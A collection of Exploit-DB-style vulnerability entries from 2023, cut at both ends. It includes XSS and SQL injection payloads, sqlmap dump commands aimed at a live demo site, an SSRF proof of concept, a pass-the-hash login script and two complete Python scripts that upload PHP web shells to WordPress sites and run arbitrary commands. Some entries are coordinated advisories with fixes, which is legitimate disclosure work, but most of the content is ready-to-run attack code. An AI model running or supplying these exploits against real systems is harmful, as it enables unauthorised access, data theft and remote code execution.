Referer: https://template189526.motopreview.com/store/category/search/?keyword=%7B%7B3*3%7D%7D
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
# Exploit Title: Barebones CMS v2.0.2 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 2023-06-03
# Exploit Author: tmrswrr
# Vendor Homepage: https://barebonescms.com/
# Software Link: https://github.com/cubiclesoft/barebones-cms/archive/master.zip
# Version: v2.0.2
# Tested : https://demo.barebonescms.com/
--- Description ---
1) Login admin panel and go to new story :
https://demo.barebonescms.com/sessions/127.0.0.1/moors-sluses/admin/?action=addeditasset&type=story&sec_t=241bac393bb576b2538613a18de8c01184323540
2) Click edit button and write your payload in the title field:
Payload: "><script>alert(1)</script>
3) After save change and will you see alert button
POST /sessions/127.0.0.1/moors-sluses/admin/ HTTP/1.1
Host: demo.barebonescms.com
Cookie: PHPSESSID=81ecf7072ed639fa2fda1347883265a4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 237
Origin: https://demo.barebonescms.com
Dnt: 1
Referer: https://demo.barebonescms.com/sessions/78.163.184.240/moors-sluses/admin/?action=addeditasset&id=1&type=story&lang=en-us&sec_t=241bac393bb576b2538613a18de8c01184323540
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
action=saveasset&id=1&revision=0&type=story&sec_t=a6adec1ffa60ca5adf4377df100719b952d3f596&lang=en-us&title=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&newtag=&publish_date=2023-06-03&publish_time=12%3A07+am&unpublish_date=&unpublish_time=
Exploit Title: Pydio Cells 4.1.2 - Server-Side Request Forgery
Affected Versions: 4.1.2 and earlier versions
Fixed Versions: 4.2.0, 4.1.3, 3.0.12
Vulnerability Type: Server-Side Request Forgery
Security Risk: medium
Vendor URL: https://pydio.com/
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-005
Advisory Status: published
CVE: CVE-2023-32750
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32750
Introduction
============
"Pydio Cells is an open-core, self-hosted Document Sharing and
Collaboration platform (DSC) specifically designed for organizations
that need advanced document sharing and collaboration without security
trade-offs or compliance issues."
(from the vendor's homepage)
More Details
============
Using the REST-API of Pydio Cells it is possible to start jobs. For
example, when renaming a file or folder an HTTP request similar to the
following is sent:
------------------------------------------------------------------------
PUT /a/jobs/user/move HTTP/2
Host: example.com
User-Agent: agent
Accept: application/json
Authorization: Bearer G4ZRN[...]
Content-Type: application/json
Content-Length: 140
{
"JobName": "move",
"JsonParameters": "{\"nodes\":[\"cell/file.txt\"],\"target\":\"cell/renamed.txt\",\"targetParent\":false}"
}
------------------------------------------------------------------------
The body contains a JSON object with a job name and additional
parameters for the job. Besides the "move" job, also a job with the name
"remote-download" exists. It takes two additional parameters: "urls" and
"target". In the "urls" parameter, a list of URLs can be specified and in
the parameter "target" a path can be specified in which to save the
response. When the job is started, HTTP GET requests are sent from the
Pydio Cells server to the specified URLs. The responses are saved into a
file, which are uploaded to the specified folder within Pydio Cells.
Potential errors are transmitted in a WebSocket channel, which can be
opened through the "/ws/event" endpoint.
Proof of Concept
================
Log into Pydio Cells and retrieve the JWT from the HTTP requests. Then,
run the following commands to start a "remote-download" job to trigger
an HTTP request:
------------------------------------------------------------------------
$ export JWT="<insert JWT here>"
$ echo '{"urls": ["http://localhost:8000/internal.html"], "target": "personal-files"}' \
| jq '{"JobName": "remote-download", "JsonParameters": (. | tostring)}' \
| tee remote-download.json
$ curl --header "Authorization: Bearer $JWT" \
--header 'Content-Type: application/json' \
--request PUT \
--data @remote-download.json 'https://example.com/a/jobs/user/remote-download'
------------------------------------------------------------------------
The URL in the JSON document specifies which URL to request. The "target"
field in the same document specifies into which folder the response is saved.
Afterwards, the response is contained in a file in the specified folder.
Potential errors are communicated through the WebSocket channel.
Workaround
==========
Limit the services which can be reached by the Pydio Cells server, for
example using an outbound firewall.
Fix
===
Upgrade Pydio Cells to a version without the vulnerability.
Security Risk
=============
The risk is highly dependent on the environment in which the attacked
Pydio Cells instance runs. If there are any internal HTTP services which
expose sensitive data on the same machine or within the same network,
the server-side request forgery vulnerability could pose a significant
risk. In other circumstances, the risk could be negligible. Therefore,
overall the vulnerability is rated as a medium risk.
Timeline
========
2023-03-23 Vulnerability identified
2023-05-02 Customer approved disclosure to vendor
2023-05-02 Vendor notified
2023-05-03 CVE ID requested
2023-05-08 Vendor released fixed version
2023-05-14 CVE ID assigned
2023-05-16 Vendor asks for a few more days before the advisory is released
2023-05-30 Advisory released
References
==========
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/
# Exploit Title: Enrollment System Project v1.0 - SQL Injection Authentication Bypass (SQLI)
# Date of found: 18/05/2023
# Exploit Author: VIVEK CHOUDHARY @sudovivek
# Version: V1.0
# Tested on: Windows 10
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14444/enrollment-system-project-source-code-using-phpmysql.html
# CVE: CVE-2023-33584
# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33584
Vulnerability Description -
Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate the SQL queries executed by the application. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system.
Steps to Reproduce -
The following steps outline the exploitation of the SQL Injection vulnerability in Enrollment System Project V1.0:
1. Launch the Enrollment System Project V1.0 application.
2. Open the login page by accessing the URL: http://localhost/enrollment/login.php.
3. In the username and password fields, insert the following SQL Injection payload shown inside brackets to bypass authentication: {' or 1=1 #}.
4. Click the login button to execute the SQL Injection payload.
As a result of successful exploitation, the attacker gains unauthorized access to the system and is logged in with administrative privileges.
# Title: MotoCMS Version 3.4.3 - SQL Injection
# Author: tmrswrr
# Date: 01/06/2023
# Vendor: https://www.motocms.com
# Link: https://www.motocms.com/website-templates/demo/189526.html
# Vulnerable Version(s): MotoCMS 3.4.3
## Description
MotoCMS Version 3.4.3 SQL Injection via the keyword parameter.
## Steps to Reproduce
1) By visiting the url:
https://template189526.motopreview.com/store/category/search/?keyword=1
2) Run sqlmap -u "https://template189526.motopreview.com/store/category/search/?keyword=1" --random-agent --level 5 --risk 3 --batch and this command sqlmap -u "https://template189526.motopreview.com/store/category/search/?keyword=1*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump
### Parameter & Payloads ###
Parameter: keyword (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: keyword=1%' AND 3602=3602 AND 'ZnYV%'='ZnYV
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://template189526.motopreview.com:443/store/category/search/?keyword=1%' AND 6651=6651 AND 'BvJE%'='BvJE
# Exploit Title: File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)
# Date: 05/31/2023
# Exploit Author: Mateus Machado Tesser
# Vendor Homepage: https://advancedfilemanager.com/
# Version: File Manager Advanced Shortcode 2.3.2
# Tested on: Wordpress 6.1 / Linux (Ubuntu) 5.15
# CVE: CVE-2023-2068
import requests
import json
import pprint
import sys
import re
PROCESS = "\033[1;34;40m[*]\033[0m"
SUCCESS = "\033[1;32;40m[+]\033[0m"
FAIL = "\033[1;31;40m[-]\033[0m"
try:
COMMAND = sys.argv[2]
IP = sys.argv[1]
if len(COMMAND) > 1:
pass
if IP:
pass
else:
print(f'Use: {sys.argv[0]} IP COMMAND')
except:
pass
url = 'http://'+IP+'/' # Path to File Manager Advanced Shortcode Panel
print(f"{PROCESS} Searching fmakey")
try:
r = requests.get(url)
raw_fmakey = r.text
fmakey = re.findall('_fmakey.*$',raw_fmakey,re.MULTILINE)[0].split("'")[1]
if len(fmakey) == 0:
print(f"{FAIL} Cannot found fmakey!")
except:
print(f"{FAIL} Cannot found fmakey!")
print(f'{PROCESS} Exploiting Unauthenticated Remote Code Execution via AJAX!')
url = "http://"+IP+"/wp-admin/admin-ajax.php"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryI52DGCOt37rixRS1", "Accept": "*/*"}
data = "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hashes[l1_cG5nLWNsaXBhcnQtaGFja2VyLWhhY2tlci5wbmc]\"\r\n\r\nexploit.php\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_shortcode_fma_ui\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"_fmakey\"\r\n\r\n"+fmakey+"\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path\"\r\n\r\n\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"url\"\r\n\r\n\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"w\"\r\n\r\nfalse\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"r\"\r\n\r\ntrue\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide\"\r\n\r\nplugins\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"operations\"\r\n\r\nupload,download\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path_type\"\r\n\r\ninside\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide_path\"\r\n\r\nno\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"enable_trash\"\r\n\r\nno\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_allow\"\r\n\r\ntext/x-php\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_max_size\"\r\n\r\n2G\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"exploit2.php\"\r\nContent-Type: text/x-php\r\n\r\n<?php system($_GET['cmd']);?>\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n\r\n------WebKitFormBoundaryI52DGCOt37rixRS1--\r\n"
r = requests.post(url, headers=headers, data=data)
print(f"{PROCESS} Sending AJAX request to: {url}")
if 'errUploadMime' in r.text:
print(f'{FAIL} Exploit failed!')
sys.exit()
elif r.headers['Content-Type'].startswith("text/html"):
print(f'{FAIL} Exploit failed! Try to change _fmakey')
sys.exit(0)
else:
print(f'{SUCCESS} Exploit executed with success!')
exploited = json.loads(r.text)
url = ""
print(f'{PROCESS} Getting URL with webshell')
for i in exploited["added"]:
url = i['url']
print(f"{PROCESS} Executing '{COMMAND}'")
r = requests.get(url+'?cmd='+COMMAND)
print(f'{SUCCESS} The application returned ({len(r.text)} length):\n'+r.text)
Exploit Title: STARFACE 7.3.0.10 - Authentication with Password Hash Possible
Affected Versions: 7.3.0.10 and earlier versions
Fixed Versions: -
Vulnerability Type: Broken Authentication
Security Risk: low
Vendor URL: https://www.starface.de
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2022-004
Advisory Status: published
CVE: CVE-2023-33243
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33243
Introduction
============
"When functionality and comfort come together, the result is a
state-of-the-art experience that we've dubbed 'comfortphoning'. It's a
secure, scalable digital communication solution that meets every need
and wish. STARFACE is easy to integrate into existing IT systems and
flexibly grows with your requirements."
(from the vendor's homepage)
More Details
============
The image of STARFACE PBX [0] in version 7.3.0.10 can be downloaded from
the vendor's homepage [1]. The included files can be further examined by
either extracting the contents or running the image in a virtual
machine. The web interface of the PBX uses the JavaScript file at the
following path to submit the login form:
------------------------------------------------------------------------
js/prettifier.js
------------------------------------------------------------------------
The following two lines of the JavaScript file "prettifier.js" add the
two parameters "secret" and "ack" to the form before being submitted:
------------------------------------------------------------------------
$form(document.forms[0]).add('secret', createHash(defaultVals.isAd, liv, lpv, defaultVals.k + defaultVals.bk));
$form(document.forms[0]).add('ack', defaultVals.k);
------------------------------------------------------------------------
The JavaScript object "defaultVals" is included in the web application's
source text. While the value of "defaultVals.k" was found to be the
static hash of the PBX version, the value of "defaultVals.bk" contains a
nonce only valid for the currently used session. Therefore, the form
parameter "ack" is always the same value. For the form value "secret"
the function "createHash()" is called with different arguments. The
value of "defaultVals.isAd" is set to "false" when login via Active
Directory is disabled. The parameters "liv" and "lpv" contain the
username and password entered into the form respectively.
------------------------------------------------------------------------
const createHash = function (isAD, user, pass, nonces) {
if (isAD) {
return forAD.encode(user + nonces + pass);
}
return user + ':' + forSF(user + nonces + forSF(pass));
};
------------------------------------------------------------------------
The expression right after the second return statement is the
implementation used when Active Directory login is disabled which is the
default setting. The return value is composed of the username separated
via a colon from a value built using the "forSF()" function. The
"forSF()" function was found to calculate the SHA512 hash value. When
considering the arguments passed to the function, the hash is calculated
as follows:
------------------------------------------------------------------------
SHA512(username + defaultVals.k + defaultVals.bk + SHA512(password))
------------------------------------------------------------------------
As can be seen, instead of the cleartext password the SHA512 hash of the
password is used in the calculation. In conclusion, for the form value
"secret" the following value is transmitted:
------------------------------------------------------------------------
username + ":" + SHA512(
username + defaultVals.k + defaultVals.bk + SHA512(password)
)
------------------------------------------------------------------------
If the SHA512 hash of a user's password is known, it can be directly
used in the calculation of the "secret" during the login process.
Knowledge of the cleartext password is not required.
This finding was also verified by analysing the decompiled Java code of
the server component. It was also found that the authentication process
of the REST API is vulnerable in a very similar manner.
Proof of Concept
================
The following Python script can be used to perform a login by specifying
a target URL, a username and the associated password hash:
------------------------------------------------------------------------
#!/usr/bin/env python3
import click
import hashlib
import re
import requests
import typing
def get_values_from_session(url, session) -> typing.Tuple[str, str]:
k, bk = "", ""
response_content = session.get(f"{url}/jsp/index.jsp").text
k_result = re.search("\sk : '([^']+)'", response_content)
bk_result = re.search("\sbk : '([^']+)'", response_content)
if k_result != None:
k = k_result.group(1)
if bk_result != None:
bk = bk_result.group(1)
return k, bk
def web_login(url, login, pwhash, session) -> bool:
version, nonce = get_values_from_session(url, session)
if version == "" or nonce == "":
print("Web Login failed: Nonce and version hash can not be retrieved.")
return
value = login + version + nonce + pwhash
secret = hashlib.sha512(value.encode("utf-8")).hexdigest()
data = {
"forward": "",
"autologin": "false",
"secret": f"{login}:{secret}",
"ack": version,
}
login_request = session.post(
f"{url}/login",
data=data,
allow_redirects=False,
headers={"Referer": f"{url}/jsp/index.jsp"},
)
response_headers = login_request.headers
if "Set-Cookie" in response_headers:
session_id = response_headers["Set-Cookie"].split("=")[1].split(";")[0]
print(f"Session ID: {session_id}")
return True
else:
print("Invalid login data")
return False
def get_nonce_from_api(url, session) -> str:
response_content = session.get(f"{url}/rest/login").json()
return response_content["nonce"] if "nonce" in response_content else ""
def rest_login(url, login, pwhash, session):
nonce = get_nonce_from_api(url, session)
if nonce == "":
print("REST Login failed: Nonce can not be retrieved.")
return
value = login + nonce + pwhash
secret = hashlib.sha512(value.encode("utf-8")).hexdigest()
data = {"loginType": "Internal", "nonce": nonce, "secret": f"{login}:{secret}"}
login_request = session.post(
f"{url}/rest/login",
json=data,
headers={"Content-Type": "application/json", "X-Version": "2"},
)
response_data = login_request.json()
token = response_data["token"] if "token" in response_data else "none"
print(f"REST API Token: {token}")
@click.command()
@click.option('--url', help='Target System URL', required=True)
@click.option('--login', help='Login ID', required=True)
@click.option('--pwhash', help='Password Hash', required=True)
def login(url, login, pwhash):
session = requests.session()
stripped_url = url.rstrip("/")
result = web_login(stripped_url, login, pwhash, session)
if result:
rest_login(stripped_url, login, pwhash, session)
if __name__ == "__main__":
login()
------------------------------------------------------------------------
For example, the SHA512 hash of the password "starface" can be
calculated as follows:
------------------------------------------------------------------------
$ echo -n "starface" | sha512sum
a37542915e834f6e446137d759cdcb825a054d0baab73fd8db695fc49529bc8e52eb27979dd1dcc21849567bac74180f6511121f76f4a2a1f196670b7375f8ec -
------------------------------------------------------------------------
The Python script can be run as follows to perform a login as the user
"0001" with the aforementioned hash:
------------------------------------------------------------------------
$ python3 login.py --url 'https://www.example.com' --login 0001 --pwhash
'a37542915e834f6e446137d759cdcb825a054d0baab73fd8db695fc49529bc8e52eb27979dd1dcc21849567bac74180f6511121f76f4a2a1f196670b7375f8ec'
Session ID: 2CF09656E274F000FFAD023AF37629CE
REST API Token: 51eef8f8vp3d3u81k0imjbuuu7
------------------------------------------------------------------------
When the password hash is valid for the specified user of the targeted
instance a session ID as well as a REST API token is returned.
Afterwards, these values can be used to interact with the web
application and the REST API.
Workaround
==========
None
Fix
===
On 4 May 2023, version 8.0.0.11 was released. In this version the
vulnerability was addressed with a temporary solution, such that the
password hashes are encrypted before they are saved in the database.
This approach prevents attackers from exploiting this vulnerability in
scenarios where they have only acquired pure database access. However,
attackers with system level access can bypass this temporary measure as
they can extract the encryption key and decrypt the hashes in the
database. A solution that fixes this vulnerability entirely is still in
progress.
Security Risk
=============
The web interface and REST API of STARFACE allow to login using the
password hash instead of the cleartext password. This can be exploited
by attackers who gained access to the application's database where the
passwords are also saved as a SHA512 hash of the cleartext passwords.
While the precondition for this attack could be the full compromise of
the STARFACE PBX, another attack scenario could be that attackers
acquire access to backups of the database stored on another system.
Furthermore, the login via password hash allows attackers for permanent
unauthorised access to the web interface even if system access was
obtained only temporarily. Due to the prerequisites of obtaining access
to password hashes, the vulnerability poses a low risk only.
Timeline
========
2022-12-06 Vulnerability identified
2022-12-13 Customer approved disclosure to vendor
2023-01-11 Vendor notified
2023-05-04 Vendor released new version 8.0.0.11
2023-05-19 CVE ID requested
2023-05-20 CVE ID assigned
2023-06-01 Advisory released
References
==========
[0] https://starface.com/en/products/comfortphoning/
[1] https://knowledge.starface.de/pages/viewpage.action?pageId=46564694
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Alter Posthof 1 Fax : +49 241 510081-99
52062 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
# Exploit Title: Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS)
# Google Dork: inurl:/wp-content/plugins/cms-tree-page-view/
# Date: 2023-04-24
# Exploit Author: LEE SE HYOUNG (hackintoanetwork)
# Vendor Homepage: https://wordpress.org/plugins/cms-tree-page-view/
# Software Link: https://downloads.wordpress.org/plugin/cms-tree-page-view.1.6.6.zip
# Category: Web Application
# Version: 1.6.7
# Tested on: Debian / WordPress 6.1.1
# CVE : CVE-2023-30868
# Reference: https://patchstack.com/database/vulnerability/cms-tree-page-view/wordpress-cms-tree-page-view-plugin-1-6-7-cross-site-scripting-xss-vulnerability?_s_id=cve
# 1. Technical Description:
The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7.
This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.
# 2. Proof of Concept (PoC):
WordPress CMS Tree Page View Plugin <= 1.6.7 Cross-Site Scripting (XSS)
In the case of this vulnerability, there are two XSS PoCs available: one for version 1.6.6 and another for version 1.6.7.
1. CMS Tree Page View Plugin <= 1.6.6
a. Send the following URL to users with administrator privileges or higher: http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E.
b. your payload will be executed.
[!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts.
2. CMS Tree Page View Plugin <= 1.6.7
a. Send the following URL to users with administrator privileges or higher: http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22+accesskey%3DC+onclick%3Djavascript%3Aalert%281%29%3B+a%3D%22.
b. Your payload will execute the script when the user presses Ctrl + Alt + c (Mac) or Alt + Shift + c (Windows).
[!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts.
# Exploit Title: Macro Expert 4.9 - Unquoted Service Path
# Date: 04/06/2023
# Exploit Author: Murat DEMIRCI
# Vendor Homepage: http://www.macro-expert.com/
# Software Link: http://www.macro-expert.com/product/gm_setup_4.9.exe
# Version: 4.9
# Tested on: Windows 10
# Proof of Concept :
C:\Users\Murat>sc qc "Macro Expert"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Macro Expert
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : c:\program files (x86)\grasssoft\macro expert\MacroService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Macro Expert
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# If a malicious payload insert into related path and service is executed in anyway, this can gain new privilege access to the system and perform malicious acts.
# Exploit Title: USB Flash Drives Control 4.1.0.0 - Unquoted Service Path
# Date: 2023-31-05
# Exploit Author: Jeffrey Bencteux
# Vendor Homepage: https://binisoft.org/
# Software Link: https://binisoft.org/wfc
# Version: 4.1.0.0
# Tested on: Microsoft Windows 11 Pro
# Vulnerability Type: Unquoted Service Path
PS C:\> wmic service get name,displayname,pathname,startmode |findstr /i
"auto" |findstr /i /v "c:\windows"
USB Flash Drives Control usbcs C:\Program Files\USB Flash
Drives Control\usbcs.exe Auto
PS C:\> sc.exe qc usbcs
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: usbcs
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\USB Flash Drives
Control\usbcs.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : USB Flash Drives Control
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
PS C:\> systeminfo
OS Name: Microsoft Windows 11 Pro
OS Version: 10.0.22621 N/A Build 22621
OS Manufacturer: Microsoft Corporation
--
Jeffrey BENCTEUX
# Exploit Title: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution
# Dork: inurl:/wp-content/themes/workreap/
# Date: 2023-06-01
# Category : Webapps
# Vendor Homepage: https://themeforest.net/item/workreap-freelance-marketplace-wordpress-theme/23712454
# Exploit Author: Mohammad Hossein Khanaki(Mr_B0hl00l)
# Version: 2.2.2
# Tested on: Windows/Linux
# CVE: CVE-2021-24499
import requests
import random
import string
import sys
def usage():
banner = '''
NAME: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution
usage: python3 Workreap_rce.py <URL>
example for linux : python3 Workreap_rce.py https://www.exploit-db.com
example for Windows : python Workreap_rce.py https://www.exploit-db.com
'''
print(f"{BOLD}{banner}{ENDC}")
def upload_file(target):
print("[ ] Uploading File")
url = target + "/wp-admin/admin-ajax.php"
body = "<?php echo '" + random_str + "';?>"
data = {"action": "workreap_award_temp_file_uploader"}
response = requests.post(url, data=data, files={"award_img": (file_name, body)})
if '{"type":"success",' in response.text:
print(f"{GREEN}[+] File uploaded successfully{ENDC}")
check_php_file(target)
else:
print(f"{RED}[+] File was not uploaded{ENDC}")
def check_php_file(target):
response_2 = requests.get(target + "/wp-content/uploads/workreap-temp/" + file_name)
if random_str in response_2.text:
print(f"{GREEN}The uploaded PHP file executed successfully.{ENDC}")
print("path: " + target +"/wp-content/uploads/workreap-temp/" + file_name)
question = input(f"{YELLOW}Do you want get RCE? [Y/n] {ENDC}")
if question == "y" or question == "Y":
print("[ ] Uploading Shell ")
get_rce(target)
else:
usage()
else:
print(f"{RED}[+] PHP file not allowed on this website. Try uploading another file.{ENDC}")
def get_rce(target):
file_name = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + ".php"
body = '<?php $command = $_GET["c"]; $output = shell_exec($command); echo "<pre>\n$output</pre>";?>'
data = {"action": "workreap_award_temp_file_uploader"}
response_3 = requests.post(target + '/wp-admin/admin-ajax.php', data=data, files={"award_img": (file_name, body)})
print(f"{GREEN}[+] Shell uploaded successfully{ENDC}")
while True:
command = input(f"{YELLOW}Enter a command to execute: {ENDC}")
print(f"Shell Path : {target}'/wp-content/uploads/workreap-temp/{BOLD}{file_name}?c={command}{ENDC}")
response_4 = requests.get(target + '/wp-content/uploads/workreap-temp/' + file_name + f"?c={command}")
print(f"{GREEN}{response_4.text}{ENDC}")
if __name__ == "__main__":
global GREEN , RED, YELLOW, BOLD, ENDC
GREEN = '\033[92m'
RED = '\033[91m'
YELLOW = '\033[93m'
BOLD = '\033[1m'
ENDC = '\033[0m'
file_name = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + ".php"
random_str = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8))
try:
upload_file(sys.argv[1])
except IndexError:
usage()
except requests.exceptions.RequestException as e:
print("\nPlease Enter Valid Address")
# Exploit Title: Thruk Monitoring Web Interface 3.06 - Path Traversal
# Date: 08-Jun-2023
# Exploit Author: Galoget Latorre (@galoget)
# CVE: CVE-2023-34096 (Galoget Latorre)
# Vendor Homepage: https://thruk.org/
# Software Link: https://github.com/sni/Thruk/archive/refs/tags/v3.06.zip
# Software Link + Exploit + PoC (Backup): https://github.com/galoget/Thruk-CVE-2023-34096
# CVE Author Blog: https://galogetlatorre.blogspot.com/2023/06/cve-2023-34096-path-traversal-thruk.html
# GitHub Security Advisory: https://github.com/sni/Thruk/security/advisories/GHSA-vhqc-649h-994h
# Affected Versions: <= 3.06
# Language: Python 3.x
# Tested on:
# - Ubuntu 22.04.5 LTS 64-bit
# - Debian GNU/Linux 10 (buster) 64-bit
# - Kali GNU/Linux 2023.1 64-bit
# - CentOS GNU/Linux 8.5.2111 64-bit
#!/usr/bin/python3
# -*- coding:utf-8 -*-
import sys
import warnings
import requests
from bs4 import BeautifulSoup
from termcolor import cprint
# Usage: python3 exploit.py <target.site>
# Example: python3 exploit.py http://127.0.0.1/thruk/
# Disable warnings
warnings.filterwarnings('ignore')
# Set headers
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
}
def banner():
"""
Function to print the banner
"""
banner_text = """
__ __ __ __ __ __ __ __ __ __
/ \\ /|_ __ _) / \\ _) _) __ _) |__| / \\ (__\\ /__
\\__ \\/ |__ /__ \\__/ /__ __) __) | \\__/ __/ \\__)
Path Traversal Vulnerability in Thruk Monitoring Web Interface ≤ 3.06
Exploit & CVE Author: Galoget Latorre (@galoget)
LinkedIn: https://www.linkedin.com/in/galoget
"""
print(banner_text)
def usage_instructions():
"""
Function that validates the number of arguments.
The application MUST have 2 arguments:
- [0]: Name of the script
- [1]: Target URL (Thruk Base URL)
"""
if len(sys.argv) != 2:
print("Usage: python3 exploit.py <target.site>")
print("Example: python3 exploit.py http://127.0.0.1/thruk/")
sys.exit(0)
def check_vulnerability(thruk_version):
"""
Function to check if the recovered version is vulnerable to CVE-2023-34096.
Prints additional information about the vulnerability.
"""
try:
if float(thruk_version[1:5]) <= 3.06:
if float(thruk_version[4:].replace("-", ".")) < 6.2:
cprint("[+] ", "green", attrs=['bold'], end = "")
